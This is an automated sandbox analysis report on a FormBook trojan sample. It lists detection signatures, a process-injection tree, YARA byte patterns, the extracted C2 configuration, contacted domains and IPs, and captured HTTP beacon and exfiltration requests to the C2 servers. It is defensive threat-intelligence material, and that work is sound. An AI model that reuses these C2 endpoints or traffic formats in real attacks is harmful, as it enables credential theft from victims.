Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PrWP76ejHO.exe

Overview

General Information

Sample Name:PrWP76ejHO.exe
Analysis ID:756343
MD5:db102a67350060a1e967aef81118f18d
SHA1:a3131a3df17a154e41c09973ca8a9aabac29929e
SHA256:98420cf47e19574739cff3f1f74bd3c6c70e103d0b28040b64fd3c77588c7ee7
Tags:32exeFormbooktrojan
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses ipconfig to lookup or modify the Windows network settings
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to read the clipboard data
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • PrWP76ejHO.exe (PID: 1832 cmdline: C:\Users\user\Desktop\PrWP76ejHO.exe MD5: DB102A67350060A1E967AEF81118F18D)
    • iscan.exe (PID: 1764 cmdline: "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Local\Temp\zxtnbfvzh.c MD5: 2B4B3369E04DEDD66517641DB0F5A8AB)
      • conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • iscan.exe (PID: 5188 cmdline: "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Local\Temp\zxtnbfvzh.c MD5: 2B4B3369E04DEDD66517641DB0F5A8AB)
        • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • iijhlev.exe (PID: 4468 cmdline: "C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe" "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Loca MD5: 2B4B3369E04DEDD66517641DB0F5A8AB)
            • conhost.exe (PID: 1836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • WerFault.exe (PID: 5096 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4468 -s 452 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
          • iijhlev.exe (PID: 4864 cmdline: "C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe" "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Loca MD5: 2B4B3369E04DEDD66517641DB0F5A8AB)
            • conhost.exe (PID: 5872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • WerFault.exe (PID: 2436 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 420 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
          • ipconfig.exe (PID: 1916 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.fedefarmatour.online/dwdp/"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x7d38:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x209e7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xc0c6:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x1960e:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x1940c:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x18eb8:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x1950e:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x19686:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xbc91:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x18103:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1f62e:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x20751:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x1b910:$sqlite3step: 68 34 1C 7B E1
    • 0x1c488:$sqlite3step: 68 34 1C 7B E1
    • 0x1b952:$sqlite3text: 68 38 2A 90 C5
    • 0x1c4cd:$sqlite3text: 68 38 2A 90 C5
    • 0x1b969:$sqlite3blob: 68 53 D8 7F 8C
    • 0x1c4e3:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.iscan.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.iscan.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x6f38:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x1fbe7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xb2c6:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1880e:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        3.2.iscan.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x1860c:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x180b8:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x1870e:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x18886:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xae91:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x17303:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1e82e:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1f951:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.iscan.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x1ab10:$sqlite3step: 68 34 1C 7B E1
        • 0x1b688:$sqlite3step: 68 34 1C 7B E1
        • 0x1ab52:$sqlite3text: 68 38 2A 90 C5
        • 0x1b6cd:$sqlite3text: 68 38 2A 90 C5
        • 0x1ab69:$sqlite3blob: 68 53 D8 7F 8C
        • 0x1b6e3:$sqlite3blob: 68 53 D8 7F 8C
        3.2.iscan.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          Click to see the 3 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: PrWP76ejHO.exeReversingLabs: Detection: 73%
          Source: PrWP76ejHO.exeVirustotal: Detection: 32%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: www.fedefarmatour.online/dwdp/Avira URL Cloud: Label: malware
          Source: http://www.t4yfrance.com/dwdp/Avira URL Cloud: Label: malware
          Source: http://www.a8-group.com/dwdp/Avira URL Cloud: Label: malware
          Source: http://www.fedefarmatour.online/dwdp/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: inhomeyoga.comVirustotal: Detection: 11%Perma Link
          Source: t4yfrance.comVirustotal: Detection: 8%Perma Link
          Source: fedefarmatour.onlineVirustotal: Detection: 14%Perma Link
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeReversingLabs: Detection: 26%
          Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exeReversingLabs: Detection: 26%
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exeJoe Sandbox ML: detected
          Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.fedefarmatour.online/dwdp/"]}
          Source: PrWP76ejHO.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: Binary string: ipconfig.pdb source: iscan.exe, 00000003.00000002.359559716.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, iscan.exe, 00000003.00000002.359328170.0000000000767000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: iscan.exe, 00000003.00000002.359559716.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, iscan.exe, 00000003.00000002.359328170.0000000000767000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: iscan.exe, 00000001.00000003.250447257.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, iscan.exe, 00000001.00000003.251103890.0000000002A70000.00000004.00001000.00020000.00000000.sdmp, iscan.exe, 00000003.00000003.252292538.00000000005D0000.00000004.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000002.360968796.0000000000B1F000.00000040.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000003.253843942.000000000086B000.00000004.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000002.359594597.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000002.511826936.0000000002EEF000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000002.510619896.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000003.357567203.00000000004E8000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: iscan.exe, iscan.exe, 00000003.00000003.252292538.00000000005D0000.00000004.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000002.360968796.0000000000B1F000.00000040.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000003.253843942.000000000086B000.00000004.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000002.359594597.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000002.511826936.0000000002EEF000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000002.510619896.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000003.357567203.00000000004E8000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeCode function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeCode function: 0_2_00405FF6 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\PrWP76ejHO.exeCode function: 0_2_00402654 FindFirstFileA,
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_00410310 FindFirstFileExW,

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.fedefarmatour.online
          Source: C:\Windows\explorer.exeDomain query: www.a8-group.com
          Source: C:\Windows\explorer.exeNetwork Connect: 50.87.143.200 80
          Source: C:\Windows\explorer.exeDomain query: www.t4yfrance.com
          Source: C:\Windows\explorer.exeDomain query: www.inhomeyoga.com
          Source: C:\Windows\explorer.exeNetwork Connect: 195.110.124.133 80
          Source: C:\Windows\explorer.exeNetwork Connect: 194.58.112.174 80
          Source: C:\Windows\explorer.exeNetwork Connect: 81.88.48.71 80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.fedefarmatour.online/dwdp/
          Source: Joe Sandbox ViewASN Name: REGISTER-ASIT REGISTER-ASIT
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: global trafficHTTP traffic detected: GET /dwdp/?DDK8=DL0dq8Xp&THg8gZ=as8dBOCYMIlGkdFtu6bNi6R+poUd8qernbVKNux/Lg6XWSTTcIv/9iufEycx+V+hXMP21oAGdeFqW0RuMIySji5bX/9mKLXNqQ== HTTP/1.1Host: www.inhomeyoga.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dwdp/?THg8gZ=o99SD4CnjZ1qu7iTZtFfc7Nx3UYgSJ0Ur2vCMIrwN9S0TIs4+nDL6lw5CChyhzqrvnlUg4IJDbpF+LHriFN/RsV5sIy/QX8aQA==&DDK8=DL0dq8Xp HTTP/1.1Host: www.fedefarmatour.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dwdp/?DDK8=DL0dq8Xp&THg8gZ=NWgjuoil9S/+22DuNJW9gHFfRnzyfGvnsPD5fu3f3YQDroVAltOshqAP1UOAIJ0eSwU/Ico7U9Xz8hxCOYRKQwl8NX3l5SYpCA== HTTP/1.1Host: www.t4yfrance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dwdp/?THg8gZ=DSbK0Z5FDwQug92xqW96a+2ughsfKsmWbm0zJjXp1SGH3e562FU2SdtvukdrkYmM3MO1KHWCknXXR+yfUTM1LtpOX41OHf8llQ==&DDK8=DL0dq8Xp HTTP/1.1Host: www.a8-group.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 195.110.124.133 195.110.124.133
          Source: global trafficHTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.fedefarmatour.onlineConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.fedefarmatour.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.fedefarmatour.online/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 6c 5f 56 79 41 4a 4b 57 6d 35 4a 64 6a 61 6d 7a 5a 34 63 63 52 76 46 56 28 51 77 74 64 72 38 62 74 55 71 38 50 61 76 72 4e 66 75 47 49 61 46 64 33 57 62 35 78 6b 56 50 43 53 4e 4c 31 44 36 73 74 55 4a 38 68 71 4d 53 49 61 64 66 7a 63 61 62 6a 45 59 34 4f 38 56 5a 36 6f 65 77 61 57 46 63 4d 31 6b 41 4f 33 78 6d 63 5f 67 6a 4d 38 77 66 77 6e 32 6e 6b 46 6f 4a 4d 51 43 49 39 71 36 4a 48 67 51 38 7e 50 61 6e 72 33 43 63 35 41 30 77 67 77 7e 47 64 79 79 71 73 73 62 4d 30 67 75 38 41 6b 34 2d 53 6c 4c 5f 7a 67 6b 4e 77 38 65 5f 4c 42 78 4c 4e 37 6c 32 66 63 6f 59 37 41 38 65 7e 7a 34 44 59 4c 69 33 67 4f 32 74 4a 66 4b 73 5a 4e 7a 46 4b 63 36 67 53 6a 30 6a 42 38 31 47 48 36 58 58 4c 48 53 51 74 6e 64 54 38 48 53 6c 70 67 5a 42 31 34 66 2d 56 55 67 49 35 5a 48 71 77 48 6d 61 4f 57 32 41 45 4c 34 6b 49 76 4f 6e 69 48 72 51 32 74 77 6a 4a 6f 5a 76 5a 4d 76 48 67 6f 61 69 54 59 67 65 7e 70 28 53 43 4e 33 74 35 30 69 45 52 77 49 6b 78 4a 55 66 28 6c 4a 5a 38 57 28 79 36 2d 7a 51 38 31 36 41 50 66 52 7a 42 69 49 34 69 68 51 67 39 66 76 79 79 76 56 6d 6b 4c 76 32 73 74 71 37 53 64 37 32 28 77 28 30 5a 6e 53 6e 5a 76 6f 4e 64 79 74 75 6b 47 4f 45 64 63 51 34 55 46 39 37 57 4f 6e 71 77 71 4e 73 42 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: THg8gZ=l_VyAJKWm5JdjamzZ4ccRvFV(Qwtdr8btUq8PavrNfuGIaFd3Wb5xkVPCSNL1D6stUJ8hqMSIadfzcabjEY4O8VZ6oewaWFcM1kAO3xmc_gjM8wfwn2nkFoJMQCI9q6JHgQ8~Panr3Cc5A0wgw~GdyyqssbM0gu8Ak4-SlL_zgkNw8e_LBxLN7l2fcoY7A8e~z4DYLi3gO2tJfKsZNzFKc6gSj0jB81GH6XXLHSQtndT8HSlpgZB14f-VUgI5ZHqwHmaOW2AEL4kIvOniHrQ2twjJoZvZMvHgoaiTYge~p(SCN3t50iERwIkxJUf(lJZ8W(y6-zQ816APfRzBiI4ihQg9fvyyvVmkLv2stq7Sd72(w(0ZnSnZvoNdytukGOEdcQ4UF97WOnqwqNsBA).
          Source: global trafficHTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.fedefarmatour.onlineConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.fedefarmatour.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.fedefarmatour.online/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 6c 5f 56 79 41 4a 4b 57 6d 35 4a 64 6a 70 7e 7a 5a 4a 63 63 65 5f 46 56 6a 67 77 52 64 72 38 63 74 55 71 34 50 66 66 37 4d 74 4f 47 49 72 31 64 33 6b 44 35 38 45 56 4f 4a 79 4e 50 71 54 37 30 74 55 4a 57 68 71 77 53 49 61 4a 66 7a 5a 65 62 6a 33 77 5f 50 38 56 62 38 6f 65 7a 65 57 45 47 4d 31 35 4a 4f 32 4e 6d 63 35 73 6a 4d 4e 77 66 78 31 75 6b 7a 6c 6f 49 53 41 43 46 7a 4b 37 49 48 67 51 43 7e 50 61 4e 72 79 65 63 35 78 45 77 68 54 47 46 49 69 79 76 76 73 62 59 7a 78 54 43 46 56 67 32 64 32 76 76 79 32 5a 65 7e 2d 58 36 52 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: THg8gZ=l_VyAJKWm5Jdjp~zZJcce_FVjgwRdr8ctUq4Pff7MtOGIr1d3kD58EVOJyNPqT70tUJWhqwSIaJfzZebj3w_P8Vb8oezeWEGM15JO2Nmc5sjMNwfx1ukzloISACFzK7IHgQC~PaNryec5xEwhTGFIiyvvsbYzxTCFVg2d2vvy2Ze~-X6RQ).
          Source: global trafficHTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.fedefarmatour.onlineConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.fedefarmatour.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.fedefarmatour.online/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 6c 5f 56 79 41 4a 4b 57 6d 35 4a 64 73 6f 4f 7a 59 6f 63 63 53 50 46 57 36 51 77 52 54 4c 38 59 74 55 32 34 50 61 76 72 4e 65 69 47 49 63 5a 64 32 47 62 35 77 6b 56 4f 4e 43 4e 4c 31 44 36 74 74 56 73 6e 68 71 41 6f 49 63 5a 66 68 37 6d 62 6a 58 77 34 51 4d 56 57 37 6f 65 77 54 32 45 47 4d 31 31 5f 4f 30 6c 32 63 35 6b 6a 4d 2d 34 66 78 33 32 6e 7a 31 6f 4a 4e 51 43 46 7a 4c 47 47 48 67 51 6f 7e 50 43 64 72 78 47 63 34 6a 73 77 74 68 7e 47 42 53 79 6f 73 73 62 47 36 41 69 67 41 6b 30 71 53 6e 58 76 7a 6a 41 4e 7e 38 65 5f 4f 48 6c 4c 58 4c 6c 4a 61 63 6f 62 37 41 67 67 7e 7a 67 44 59 4f 4b 42 67 37 79 74 62 72 75 73 50 34 6e 47 46 4d 36 69 61 44 30 38 4c 63 78 56 48 36 6e 54 4c 47 4b 51 73 56 52 54 39 77 7e 6c 6c 6d 4e 42 77 59 66 79 56 55 67 35 6d 4a 4b 49 77 44 7e 30 4f 57 57 41 45 63 59 6b 4a 38 6d 6e 6c 30 7a 51 34 39 77 62 50 6f 5a 62 4d 63 76 6e 67 6f 54 38 54 62 68 42 7e 70 7a 53 4d 39 48 74 28 67 4f 46 56 67 49 67 78 4a 56 54 28 6c 4a 72 38 57 4b 4a 36 37 32 6e 38 46 47 41 4f 59 39 7a 41 78 67 34 67 78 51 6c 34 66 76 7a 79 76 59 79 6b 4c 7a 59 73 73 71 37 53 4f 37 32 28 7a 33 30 59 55 36 6e 57 50 6f 32 4a 69 73 5a 67 48 71 4f 56 76 41 48 66 6a 4a 2d 51 62 7e 4f 6d 65 51 72 56 50 48 56 4e 41 33 55 75 76 51 52 6b 74 43 51 66 70 6a 36 57 30 78 50 6a 62 78 39 67 77 64 46 48 41 28 64 47 6b 64 51 62 46 51 68 56 73 6b 53 61 4e 37 74 55 42 44 36 76 34 48 54 36 63 6b 4b 4c 64 70 49 65 31 51 79 44 68 78 31 48 75 78 43 76 52 6a 63 28 66 4d 49 78 67 72 39 6d 4e 6f 54 58 50 32 32 7a 54 6f 71 69 72 4c 4f 6d 55 6f 56 41 68 54 6f 30 6d 37 42 71 34 77 6c 70 79 6d 5a 53 54 58 42 77 6f 61 5a 4e 32 33 43 70 54 31 39 42 7a 53 32 36 72 61 73 7e 38 61 4a 43 39 64 73 53 62 46 33 6e 69 7e 61 46 41 71 61 68 6f 30 36 58 69 75 50 6e 75 4f 50 56 58 64 4f 79 42 39 41 28 38 52 2d 32 49 39 57 4d 58 32 6d 4b 5f 69 4b 72 6e 42 55 48 37 77 69 37 6f 38 42 7a 6a 36 65 45 32 6a 46 6f 42 51 59 74 52 71 48 67 5a 33 4f 7e 61 50 53 68 73 54 43 50 59 55 6c 4d 73 59 56 6c 4b 42 56 68 36 63 51 43 48 32 4d 70 44 59 49 43 76 37 5f 48 47 4b 49 56 37 4b 62 38 53 67 77 4a 63 4d 75 63 75 6d 39 35 49 78 4f 77 41 75 46 51 31 57 58 7e 69 58 67 62 39 44 42 58 72 36 30 33 4d 33 48 77 66 77 62 72 51 56 48 47 42 59 4c 7e 51 31 30 48 38 67 32 34 38 4b 76 4f 4c 4b 74 37 5f 75 6f 6c 6b 4c 4a 76 31 5a 68 55 56 6a 55 76 32 7a 30 32 30 4e 73 4b 38 49 57 6a 31 56 63 46 35 66 76 72 74 4e 69 53 6f 30 6e 76 56 30 55 47 70 68 47 31 5a 67 74 78 2d 38 6d 54 54 7a 46 72 46 49 6b 4b 6f 76 79 39 53 53 4e 70 71 6e 44 52 37 57 56 54 6d 41 75 56 66 70 39 46 76 77 55 6c 47 4f 7
          Source: global trafficHTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.t4yfrance.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.t4yfrance.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.t4yfrance.com/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 41 55 49 44 74 64 4f 6e 28 46 54 77 78 78 72 49 62 76 44 30 68 32 78 30 53 7a 6e 56 66 47 4c 51 30 61 36 50 62 65 44 5f 35 4c 30 2d 78 4c 59 65 75 4c 48 4e 6f 36 67 71 38 69 54 47 49 35 74 72 50 78 67 71 52 36 30 6d 54 71 72 38 6b 68 78 4a 41 6f 73 36 51 57 39 57 50 6e 33 6c 6d 53 38 35 4c 73 70 4d 31 35 55 7a 49 6d 35 63 56 79 69 69 66 4a 70 4f 44 33 68 42 32 48 68 77 57 75 49 31 4c 4c 67 49 78 69 79 52 6b 70 74 33 33 34 69 35 36 75 28 54 6e 52 51 49 33 4a 31 42 62 56 4e 4d 66 78 7e 37 35 6a 52 69 31 38 78 75 48 69 43 6a 33 50 48 55 48 33 4f 30 4c 6e 52 6b 5a 31 5a 47 42 50 68 6b 52 6b 6d 4c 64 69 65 70 39 6b 57 43 4a 52 35 49 49 64 51 77 63 4b 77 5a 52 57 79 58 58 70 72 34 63 7a 6d 55 44 47 6b 6c 70 7a 34 32 44 6b 70 49 71 79 73 5f 73 31 39 31 7e 41 6a 43 34 48 4b 79 57 79 75 72 74 55 46 62 49 50 32 5a 71 54 49 51 44 4f 6d 34 45 30 32 4e 77 6a 47 56 63 31 59 45 4e 51 45 54 6f 30 77 79 63 4c 7e 42 6b 4c 5a 30 6d 6c 65 51 44 4e 75 53 37 58 69 55 79 76 39 43 6b 39 73 70 71 66 74 58 50 6b 73 6e 6b 2d 71 30 54 45 42 4f 4b 4d 32 5f 56 76 68 2d 6f 6c 33 6e 70 71 32 61 59 35 71 42 42 48 63 6e 5a 2d 70 51 54 34 42 45 45 62 5a 7a 70 6f 4b 76 36 70 43 4d 76 66 55 6a 56 4a 54 34 6a 6f 6d 33 67 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: THg8gZ=AUIDtdOn(FTwxxrIbvD0h2x0SznVfGLQ0a6PbeD_5L0-xLYeuLHNo6gq8iTGI5trPxgqR60mTqr8khxJAos6QW9WPn3lmS85LspM15UzIm5cVyiifJpOD3hB2HhwWuI1LLgIxiyRkpt334i56u(TnRQI3J1BbVNMfx~75jRi18xuHiCj3PHUH3O0LnRkZ1ZGBPhkRkmLdiep9kWCJR5IIdQwcKwZRWyXXpr4czmUDGklpz42DkpIqys_s191~AjC4HKyWyurtUFbIP2ZqTIQDOm4E02NwjGVc1YENQETo0wycL~BkLZ0mleQDNuS7XiUyv9Ck9spqftXPksnk-q0TEBOKM2_Vvh-ol3npq2aY5qBBHcnZ-pQT4BEEbZzpoKv6pCMvfUjVJT4jom3gA).
